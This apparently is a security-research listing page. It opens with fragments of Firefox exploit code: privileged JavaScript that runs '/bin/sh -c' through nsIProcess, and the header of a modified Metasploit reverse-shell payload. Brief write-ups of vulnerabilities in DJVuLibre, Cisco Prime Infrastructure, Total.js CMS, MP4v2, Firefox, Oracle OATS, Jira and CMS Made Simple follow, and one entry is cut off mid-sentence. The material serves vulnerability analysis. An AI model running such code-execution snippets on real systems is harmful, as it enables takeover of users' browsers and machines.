| // This should work on the latest version of Firefox | |
| (function(){ | |
| var cmd = "echo test > /tmp/ph33r2.txt"; | |
| var shell; | |
| var shEsc = "\\$&"; | |
| var shPath = "/bin/sh -c"; | |
| shell = shPath+" "+cmd.replace(/\W/g, shEsc); | |
| //shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1"; | |
| var process = Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); |
| // This is a modified Metasploit payload firefox/shell_reverse_tcp | |
| // As of May 14 2020, the current version in Metasploit is extremely out of date. | |
| // Based on my testing, it probably stopped working since 2017 or earlier. | |
| // Originally the payload was created by Joe Vennix in 2014. | |
| // This payload has only been tested on Windows. | |
| // To test this, load it in the web console, but make sure devtools.chrome.enabled is on, | |
| // which by default is enabled in some versions. | |
| // Versions tested: | |
| // 60.0 (32-bit) |
DJVuLibre is an open source library for DjVu, a web-centric format and software platform for distributing documents and images. According to the official site, it is used by many academic, commercial, government, and non-commercial websites around the world.
A vulnerability was found by researcher Hongxu Chen. An out-of-bound read is possible when parsing a DJVU file, resulting a denial-of-service condition.
Cisco Prime Infrastructure (CPI) is a wired and wireless network management software suite that consists of different networking applications from Cisco Systems. The system is used across various industries, from healthcare, manufacturing, government, IT, etc.
A vulnerability was found in the runrshell binary, which would allow a local user to gain control under the context of root. It is also chained by other publicly known CPI remote exploits to get root in one shot, such as CVE-2018-15379 by Pedro Ribeiro, and CVE-2019-1821 by Steven Seeley.
As of now, there appears to be no patch from Cisco.
Total.js is a Node.js Framework for building e-commerce applications, REST services, real-time apps, or apps for Internet of Things (IoT), etc. Total.js CMS is a Content Management System (application) that is part of the Total.js framework. A commercial version is also available, and can be seen used world-wide.
In Total.js CMS, a user with admin permission may be able to create a widget, and extend CMS functionalities for visitors. However, this can also be abused to upload JavaScript code that will be evaluated server side. As a result, it is possible to embed malicious JavaScript in the new widget, and gain remote code execution.
LibMP4v2 is an open source MP4 processing library, designed to create and modify MP4 files as defined by ISO-IEC:14496-1:2001 MPEG-4 Systems.
Originally discovered by Ruikai Liu, a double free vulnerability was found in the MP4StringProperty code. While parsing MP4 atoms, it is possible to cause a MP4StringProperty's value to be freed twice due to exception handling, resulting a double free condition. Since this is library code and not actively maintained, many third party applications seem to be affected by this without a fix.
Firefox is a free and open-source web browser developed by the Mozilla Foundation.
A use-after-free vulnerability can occur after deleting a selection element due to a weak reference to the select element in the options collection, which gets garbage collected, and results in a potentially exploitable crash. Originally, it was discovered by Nils.
Oracle Application Testing Suite (OATS) is a comprehensive, integrated testing solution for web applications, web services, packaged Oracle applications, and Oracle databases. OATS is part of an application deployed in the WebLogic service on port 8088, which also includes these tools: Administrator, OpenScript, Oracle Load Testing, and Oracle Test Manager.
In the Load Testing component, a vulnerability was discovered by Steven Seeley (@mr_me) of Source Incite in the DownloadServlet class. According to the Source Incite advisory, the issue results from the lack of proper validation of a user-supplied string before using it to read a file. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Note that authentication is required.
This vuln
Jira is a Java application for the purposes of bug tracking and agile project management developed by Atlassian. According to Atlassian, Jira is used by over 75,000 customers in 122 countries. Some high-profile organizations include Fedora Commons, NASA, Skype Technogies, Twitter, United States Deaprtment of Defense, etc.
The upload feature in the The Universal Plugin Manager (UPM) would allow a Jira user to upload a malicious plugin (add-on), and acheive remote code exeuction. This also implies authentication is required in order to acheive this.
Originally, an exploit module was submitted to Metasploit by Alex Gonzalez, and this is how our analysis started.
CMS Made Simple (CMSMS) is an open source content management system. It can be used for various purposes such as galleries, company and user directories, guestbooks, E-Commerce, blogs, etc, depending on the module the user installs. It is written in PHP, and runs on MySQL.
One of the commonly downloaded modules for CMSMS is called Showtime2, a slideshow feature. In it, the watermark support allows an authenticated user (likely an administrator) to upload a watermark image, which can be abused to upload a malicious payload.
A Metasploit module was submitted on March 19th 2019, which allowed me to investigate the vulnerability.